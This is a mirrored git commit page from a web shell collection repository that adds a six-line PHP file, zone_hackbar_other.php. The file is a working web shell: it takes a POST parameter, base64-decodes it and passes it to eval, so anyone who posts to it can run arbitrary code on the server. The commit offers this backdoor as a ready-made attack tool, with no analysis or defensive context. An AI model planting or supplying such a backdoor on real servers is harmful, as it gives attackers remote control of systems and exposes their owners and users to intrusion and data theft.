mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create zone_hackbar_other.php
This commit is contained in:
parent
2ca0e86887
commit
374204e0a1
1 changed files with 6 additions and 0 deletions
6
php/zone_hackbar_other.php
Normal file
6
php/zone_hackbar_other.php
Normal file
|
@ -0,0 +1,6 @@
|
|||
<?php
|
||||
$a = $_POST['n985de9'];
|
||||
if(isset($a)) {
|
||||
eval(base64_decode($a));
|
||||
}
|
||||
?>
|
Loading…
Reference in a new issue